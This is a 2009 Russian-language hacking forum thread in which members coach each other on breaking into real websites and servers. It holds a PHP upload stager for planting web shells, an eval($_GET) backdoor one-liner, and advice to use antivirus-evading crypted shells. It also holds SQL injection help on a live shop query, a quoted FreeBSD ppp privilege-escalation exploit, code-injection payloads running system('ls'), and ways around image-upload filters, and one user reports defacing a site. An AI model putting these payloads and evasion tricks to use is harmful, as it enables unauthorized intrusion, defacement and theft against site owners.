Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    о, молодца, дальше почитай phpinfo, который выводится, там много интересного и познавательного можно увидеть.

    Попробуй залить теперь вместо <?phpinfo();?> такую приблудку:

    <form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>

    запусти и попробуй залить сразу рабочий шелл с компа прямо, или не шелл, картинку например, главное залить

    PS: Шеллы лить - не рутина, но ребус

    Учитывая, что винда - большая вероятность антивируса, скорее всего придется искать "нормально" криптованный шелл, а не с99 стандартный из паблика. Сам у себя запусти AV и попробуй обратиться к шеллу, который льешь, например просто открыть его в ноутпаде.

    если попалась стандартная ситуация - повезло. Но везет не всегда.
     
    #8781 Pashkela, 8 Sep 2009
    Last edited: 8 Sep 2009
    1 person likes this.
  2. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    спасибо!хороший скрипт,тока он не хочет заливать шел,а выполняеться,а на своем хосте все норм :confused:
    там сервер на винде может из за этого,у меня бывают с ними проблемы :mad:
     
    #8782 Shadrin, 8 Sep 2009
    Last edited: 8 Sep 2009
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ищи нормальный криптованный шелл, вот что я тебе могу сказать напоследок. Если работает phpinfo - значит дело в шляпе.
     
  4. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    все замутил)))
    спасибо попугаю за его скрипит
    :cool:
    создал в той дире с99 хз в чем дело было :confused:
    ап
    дело наверно в том что у деда где висит этот сайт,нет белого айпи,и аплоад не работал.
    и шелл тоже файлы не грузить.Зато морда правиться :D
     
    #8784 Shadrin, 8 Sep 2009
    Last edited: 8 Sep 2009
  5. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Пробел нужен, <?php eval($_GET[e]); ?>
     
    1 person likes this.
  6. paypoker

    paypoker New Member

    Joined:
    3 Aug 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    помогите с инекцией как сделать правильный запрос
    SELECT SQL_CALC_FOUND_ROWS DISTINCT i.id, i.dimensions, i.prweight, i.prtype, i.processor, i.slots2 as slots, i.cards2 as cards, i.os2 as os, i.memory2 as memory, i.description2 as description, i.display2 as display, i.resolution2 as resolution, i.battery2 as battery, i.communication2 as communication, i.other2 as other, i.control2 as control, i.handcr2 as handcr, i.adddevice2 as adddevice, i.contents2 as contents, i.apps2 as apps, i.price, i.pricepromo, i.text2 as text, date_format(i.addtime,'%d/%m/%Y') as litaddtime, if(i.instock = 1,'instock','notinstock') as state, if(i.title2 <>'', i.title2,i.title2) as title, if(c.title2 <>'',c.title2,c.title2) as category, br.title as brand, br.onhp as otherbr, ifnull(im1.image,im.image) as image, im.firstimage, if(i.category_id in(1,3),1,0) as pdas, i.brand_id, i.category_id, i.status FROM items as i left join brands as br on i.brand_id = br.id left join categories as c on i.category_id = c.id left join images as im on im.item_id = i.id left join images as im1 on im1.item_id = i.id and im1.firstimage = 1 WHERE i.active=1 AND i.status ='Active' GROUP BY i.id HAVING 1=1 AND ( id='a'' OR title like '%a'%' or description like '%a'%' or communication like '%a'%' or other like '%a'%' or contents like '%a'%' or apps like 'a'' or memory like '%a'%' or display like '%a'%' or category like '%a'%' or brand like '%a'%' or processor like '%a'%' or text like 'a'' ) LIMIT 0, 4

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''%' or description like '%a'%' or communication like '%a'%' or other like '%a'' at line 54
    параметр передается везде где сейчас a'
     
  7. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2paypoker
    %a'%
    id='a''
    лишная кавычка) попробуй инжектить
     
  8. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Вопрос такой,можно ли в тиблицах джумлы последних версий,найти урл самого сайта где она стоит,раньше дампил контент и искал по гуглу,а тут контент дефолтный.
    спасибо
     
    #8788 Shadrin, 9 Sep 2009
    Last edited: 9 Sep 2009
  9. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Что делать если .NET (MSSQL) режет слова, а точнее говорит что это еррор
    пробовал в скобки заключать и делать типо %64%40

    PHP:
    줄 76:             {
    줄 77:                 DsCom.CommandText szQuery;
    줄 78:                 this.dr DsCom.ExecuteReader();
    줄 79:                 m_nRowCount 0;
    줄 80:             }
    PHP:
    [SqlException (0x80131904): 키워드 'or' 근처의 구문이 잘못되었습니다.]
       
    System.Data.SqlClient.SqlConnection.OnError(SqlException exceptionBoolean breakConnection) +1950890
       System
    .Data.SqlClient.SqlInternalConnection.OnError(SqlException exceptionBoolean breakConnection) +4846875
       System
    .Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +194
       System
    .Data.SqlClient.TdsParser.Run(RunBehavior runBehaviorSqlCommand cmdHandlerSqlDataReader dataStreamBulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj) +2392
       System
    .Data.SqlClient.SqlDataReader.ConsumeMetaData() +33
       System
    .Data.SqlClient.SqlDataReader.get_MetaData() +83
       System
    .Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader dsRunBehavior runBehaviorString resetOptionsString) +297
       System
    .Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehaviorRunBehavior runBehaviorBoolean returnStreamBoolean async) +954
       System
    .Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehaviorRunBehavior runBehaviorBoolean returnStreamString methodDbAsyncResult result) +162
       System
    .Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehaviorRunBehavior runBehaviorBoolean returnStreamString method) +32
       System
    .Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behaviorString method) +141
       System
    .Data.SqlClient.SqlCommand.ExecuteReader() +89
       MinWeb
    .Lib.DBManager.SetDataReader(String szQueryin d:\WebData\test.com_www\App_Code\MinWebLib_DBManager.cs:78
       Community_Screenshot_View
    .Page_Load(Object senderEventArgs ein d:\WebData\test.com_www\Community\Screenshot\View.aspx.cs:62
       System
    .Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fpObject oObject tEventArgs e) +14
       System
    .Web.Util.CalliEventHandlerDelegateProxy.Callback(Object senderEventArgs e) +35
       System
    .Web.UI.Control.OnLoad(EventArgs e) +99
       System
    .Web.UI.Control.LoadRecursive() +50
       System
    .Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPointBoolean includeStagesAfterAsyncPoint) +627
     
  10. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Здраствуйте.
    Хочу поднять прова root на сервере ОС
    FreeBSD 6.3-RELEASE-p5
    Сам эксплоит:
    Code:
    /***********************************************************************************/
    
    /***     pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/
    
    /***     2003 / 12 /23   - PRIVATE CODE                                          ***/
    
    /***     Program terminated with signal 11, Segmentation fault.                  ***/
    
    /***     #0  0xbeefdead in ?? ()                                                 ***/
    
    /***********************************************************************************/
    
    
    I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on OpenBSD (unconfirmed on 4.2)
    
    
    Steps to reproduce:
    
    
    1. Run ppp
    
    2. type the following (or atleat some variation of)
    
    ~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    xxxxxxxxxxxxxxxxxxxxx
    
    
    This will produce a segmentation violation (Core dumped).
    
    
    Discovered by: sipher
    
    
    Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers@dalnet
    
    Обьясните пожалуйсто что такое "user-ppp" и как его запустить?
     
  11. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    ppp это модемный сервис в фряхе.

    user PPP - это PPP уровня пользователя
     
    #8791 z00MAN, 9 Sep 2009
    Last edited: 9 Sep 2009
    1 person likes this.
  12. 2pick

    2pick Elder - Старейшина

    Joined:
    17 Mar 2007
    Messages:
    117
    Likes Received:
    39
    Reputations:
    2
    Столкнулся со следующей ситуацией:
    PHP:
    $pageList = array();
    $fileList = array();

         
    $pageList[1] = 'Contact Information';
         
    $pageList[2] = 'Event Information';
         
    $pageList[3] = 'Payment Information';
         
    $pageList[4] = 'Submit';

         
    $fileList[1] = 'ContactBP';
         
    $fileList[2] = 'Events';
         
    $fileList[3] = 'Payment';
         
    $fileList[4] = 'Success';

      
    $file $fileList[$pageNo];

     eval( 
    "{$file}Page::createPage(" '$pageNo, $pageList, $theme, $fileList );' );

    К $pageNO доступ извне есть, но:
    1. отсекается $file = $fileList[$pageNo]
    2.так же сильно обламывает $fileList = array()

    Подскажите, есть ли способ какой-то обойти оба способа "защиты"?
     
  13. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    нет.
     
  14. none222

    none222 Guest

    Reputations:
    0
    если Регистр_глобалз=ОН, то
    попробуй передать код через переменную
    $theme.
    примерно такого плата:
    ; system('ls');/*
     
  15. none222

    none222 Guest

    Reputations:
    0
    Хотя нет, тока заметил, там кавычки одинарные!
    ТОгда передай что-нить через $pageNO, отсечётся строчка и $file будет неинициализирован и передай в $file чтонить =)
    если я прально етбя понял то должно сработать:

    ?pageNO=1&file=;system("ls");/*

    естественно регистр_глобалс=ОН
     
  16. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Ты хоть сам проверяшь то, что советуешь? $file будет инициализирован пустым значением.
     
  17. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    если к примеру я могу залить картинку,но когда переименовываю шелл в расширение картинки и двиг при аплоаде его бьет,то по какому принципу едет проверка ?
    я просто не знаю в какую строну копать
     
  18. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    скорее всего сигнатура проверяется. попробуй захексить, но эт маловероятный прогон :(
     
  19. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Ресайз картинки, тут ничего не сделать.
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Поясни пожалуйста. Какая сигнатура может проверяться (желательно с реализацией хотя-бы приблизительной) и что ты посоветовал ему захексить?

    Shadrin
    Проверок при загрузке картинок не так много, основные это расширение, Content-Type, прогон через например getimagesize().

    Если расширение грамотно проверяется через белый список, то грузятся только разрешённые, но можно прогрузить картинку под последующий LFI. Если идёт дополнительная проверка например getimagesize(), то всё-равно можно впихать код в метаданные.

    А вот если, как сказал BlackSun, над картинкой начинают издеваться, (ресайз или какие-то другие преобразования при которых теряются метаданные) то это уже не обойти, и даже под LFI ты уже ничего не загрузишь.

    Есть ещё куча вариантов, это основные, ну и надеюсь нам it's my сейчас объяснит, что он имел ввиду под "захексить", и как это помогает обходу.
     
    1 person likes this.
Thread Status:
Not open for further replies.